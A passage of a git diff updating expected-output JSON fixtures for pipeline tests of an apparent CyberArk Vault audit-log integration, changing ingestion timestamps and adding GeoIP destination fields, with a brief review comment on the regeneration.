password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Active\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", 
@@ -651,7 +651,7 @@ "event": { "severity": 2, "reason": "test", - "ingested": "2021-12-09T13:36:45.560128600Z", + "ingested": "2021-12-14T14:42:10.855177295Z", "original": "\u003c5\u003e1 2021-03-10T18:27:57Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:27:57\",\"IsoTimestamp\":\"2021-03-10T18:27:57Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"test\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", 
@@ -746,7 +746,7 @@ "event": { "severity": 2, "reason": "test", - "ingested": "2021-12-09T13:36:45.560134100Z", + "ingested": "2021-12-14T14:42:10.855177785Z", "original": "\u003c5\u003e1 2021-03-10T18:28:07Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:28:07\",\"IsoTimestamp\":\"2021-03-10T18:28:07Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"test\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", 
@@ -852,7 +852,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-12-09T13:36:45.560139700Z", + "ingested": "2021-12-14T14:42:10.855178265Z", "original": "\u003c5\u003e1 2021-03-10T23:39:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:22\",\"IsoTimestamp\":\"2021-03-10T23:39:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"24\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615419536\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614868762\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", 
@@ -938,7 +938,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-12-09T13:36:45.560145600Z", + "ingested": "2021-12-14T14:42:10.855178743Z", "original": "\u003c5\u003e1 2021-03-10T23:39:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:25\",\"IsoTimestamp\":\"2021-03-10T23:39:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615387136\"},{\"Name\":\"CurrInd\",\"Value\":\"1\"}]}}}}", "code": "295", "kind": "event", 
@@ -1034,7 +1034,7 @@ "event": { "severity": 2, "reason": "lksajdflkasdf", - "ingested": "2021-12-09T13:36:45.560151200Z", + "ingested": "2021-12-14T14:42:10.855179148Z", "original": "\u003c5\u003e1 2021-03-11T16:41:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:41:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:41:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMAdmin\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003elksajdflkasdf\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMAdminConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:41:21\",\"IsoTimestamp\":\"2021-03-11T16:41:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMAdmin\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"lksajdflkasdf\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMAdminConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", 
@@ -1128,7 +1128,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:45.560174600Z", + "ingested": "2021-12-14T14:42:10.855179742Z", "original": "\u003c5\u003e1 2021-03-11T16:50:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:50:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:50:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMServer\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMConnect\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"169.254.180.25\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"VAGRANT-2012-R2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:50:28\",\"IsoTimestamp\":\"2021-03-11T16:50:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSMServer\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"UserName\",\"Value\":\"PSMConnect\"},{\"Name\":\"Address\",\"Value\":\"169.254.180.25\"},{\"Name\":\"LogonDomain\",\"Value\":\"VAGRANT-2012-R2\"}]}}}}", "code": "295", "kind": "event", 
@@ -1222,7 +1222,7 @@ "event": { "severity": 2, "reason": "sdfsdf", - "ingested": "2021-12-09T13:36:45.560180100Z", + "ingested": "2021-12-14T14:42:10.855180150Z", "original": "\u003c5\u003e1 2021-03-11T16:54:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:54:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:54:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-centos8-PSMApp_VAGRANT\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003esdfsdf\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"PSMApp_VAGRANT\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"centos8\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:54:20\",\"IsoTimestamp\":\"2021-03-11T16:54:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSH-centos8-PSMApp_VAGRANT\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"sdfsdf\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"PSMApp_VAGRANT\"},{\"Name\":\"Address\",\"Value\":\"centos8\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "295", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json index 8ae5563f787..7064f411858 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-300-psm-connect.log-expected.json 
@@ -82,7 +82,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331129200Z", + "ingested": "2021-12-14T14:42:12.780164303Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" 
Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"300\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "300", "kind": "event", @@ -106,10 +106,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
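Review bot: The new `destination.geo` block in the @@ -106 hunk (and the identical hunks at @@ -215, @@ -324, @@ -433, @@ -542 and @@ -651) pins values that presumably come from the test stack's GeoIP database rather than from the ingest pipeline itself, so this expectation file is now coupled to whatever database the elastic-package version under test ships; that should be confirmed, and a short comment in the package's test README or changelog should record it so the next regeneration against a different database is not mistaken for a pipeline regression. The `event.ingested` values in every hunk of this file also change on each regeneration and carry no information about the pipeline; declaring `event.ingested` as a dynamic field in the test config would keep future diffs limited to real output changes. The enclosing JSON document continues outside these hunks.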
@@ -191,7 +200,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331138600Z", + "ingested": "2021-12-14T14:42:12.780166749Z", "original": "\u003c5\u003e1 2021-03-11T17:38:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:20\",\"IsoTimestamp\":\"2021-03-11T17:38:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -215,10 +224,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -300,7 +318,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331144600Z", + "ingested": "2021-12-14T14:42:12.780167186Z", "original": "\u003c5\u003e1 2021-03-11T17:46:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:46:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:46:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n 